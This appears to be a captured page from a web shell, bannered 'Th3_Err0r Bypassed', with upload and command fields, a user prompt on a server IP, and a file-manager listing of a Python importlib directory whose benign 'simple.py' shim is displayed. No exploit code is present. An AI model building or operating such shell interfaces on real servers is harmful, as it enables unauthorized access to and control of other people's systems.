[ Th3_Err0r Bypassed ]




Upload:

Command:

liwaavux@216.73.216.91: ~ $
"""
Compatibility shim for .resources.simple as found on Python 3.10.

Consumers that can rely on Python 3.11 should use the other
module directly.
"""

from .resources.simple import (
    SimpleReader, ResourceHandle, ResourceContainer, TraversableReader,
)

__all__ = [
    'SimpleReader', 'ResourceHandle', 'ResourceContainer', 'TraversableReader',
]

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
metadata Folder 0755
resources Folder 0755
__init__.py File 4.66 KB 0644
_abc.py File 1.32 KB 0644
_bootstrap.py File 56.21 KB 0644
_bootstrap_external.py File 71.52 KB 0644
abc.py File 7.48 KB 0644
machinery.py File 934 B 0644
readers.py File 327 B 0644
simple.py File 354 B 0644
util.py File 10.94 KB 0644